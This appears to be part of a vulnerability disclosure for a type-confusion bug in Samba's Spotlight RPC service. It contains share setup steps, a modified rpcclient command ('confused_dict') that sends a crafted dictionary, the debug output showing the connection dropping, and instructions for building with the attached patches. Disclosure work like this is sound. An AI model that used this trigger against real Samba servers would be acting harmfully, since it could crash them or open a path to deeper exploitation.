## Proof-Of-Concept

We extended the `rpcclient` CLI tool from the Samba project's own source code with a `confused_dict` command that lets us send a dictionary which leads to the type confusion.

### Configuration

1. Create the directory for the share: `mkdir ~/sambashare`
2. Set up a new Samba share in `/etc/samba/smb.conf`:

```ini
# [...]
[sambashare]
   comment = Samba on KUDU
   path = /home/user/sambashare
   read only = no
   browsable = yes
   guest ok = yes
```

3. We also assume that a user named `user` with the password `user` was created beforehand and that this user is allowed to access the share `sambashare`.

### Usage

```bash
bin/rpcclient -U 'user' --password=user 'ncacn_np:localhost[\pipe\mdssvc]' -c "confused_dict sambashare /tmp"
Can't load /usr/local/samba/etc/smb.conf - run testparm to debug it
[DEBUG] Got an handle!
[DEBUG] command name added!
[DEBUG] sl_dict_t created!
[DEBUG] Dictionary built!
DALLOC_CTX(#1): {
	sl_array_t(#2): {
		sl_array_t(#3): {
			string: openQueryWithParams:forContext:
			uint64_t: 0xdeadbeef
			uint64_t: 0xcafebabe
		}
		sl_dict_t(#4): {
			string: kMDQueryString
			string: *
			string: kMDScopeArray
			string: AAAABBBB
		}
	}
}
dcerpc_mdssvc_cmd failed: NT_STATUS_CONNECTION_DISCONNECTED
result was NT_STATUS_CONNECTION_DISCONNECTED
```

### Patch

A series of two patches was applied against the master branch at commit `01cdc5e00be78a51f0766634cc7fe50de2088203`:

```bash
> git clone https://gitlab.com/samba-team/samba.git
> cd samba
> git apply 0001-add-the-raw_blob-command-for-the-Spotlight-RPC-in-rp.patch
> git apply 0002-add-confused_dict-command-to-rpcclient-to-trigger-th.patch
```

The patches are attached to this report.
## Build instructions

On [Ubuntu 22.10](https://wiki.samba.org/index.php/Package_Dependencies_Required_to_Build_Samba#Debian_/_Ubuntu):

```bash
> apt-get install acl attr autoconf bind9utils bison build-essential \
    debhelper dnsutils docbook-xml docbook-xsl flex gdb libjansson-dev krb5-user \
    libacl1-dev libaio-dev libarchive-dev libattr1-dev libblkid-dev libbsd-dev \
    libcap-dev libcups2-dev libgnutls28-dev libgpgme-dev libjson-perl \
    libldap2-dev libncurses5-dev libpam0g-dev libparse-yapp-perl \
    libpopt-dev libreadline-dev nettle-dev perl perl-modules pkg-config \
    python-all-dev python-crypto python-dbg python-dev python-dnspython \
    python3-dnspython python-gpgme python3-gpgme python-markdown python3-markdown \
    python3-dev xsltproc zlib1g-dev liblmdb-dev lmdb-utils
> ./configure --enable-debug
> make -j
```